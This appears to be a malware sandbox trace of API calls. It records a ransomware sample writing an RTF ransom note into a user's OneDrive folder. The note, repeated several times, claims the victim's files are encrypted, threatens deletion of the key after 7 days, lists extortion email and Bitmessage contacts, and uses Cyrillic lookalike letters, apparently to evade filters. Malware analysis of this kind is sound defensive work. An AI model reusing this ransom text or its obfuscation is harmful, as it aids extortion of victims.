ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\";ÞÒ\x18\x06ýoÏ»Qò\x1bß°ÞbÜØ\x8f\x8cÍ|\x03\r", lpUsedDefaultChar=0x0) returned 8717 [0299.001] WriteFile (in: hFile=0x27c, lpBuffer=0x24866c8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x24866c8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0299.002] CloseHandle (hObject=0x27c) returned 1 [0299.002] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\qml\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\qml\\#readme_eman#.rtf")) returned 0xffffffff [0299.002] GetLastError () returned 0x2 [0299.002] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\qml\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\qml\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0299.053] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0299.053] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0299.053] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r 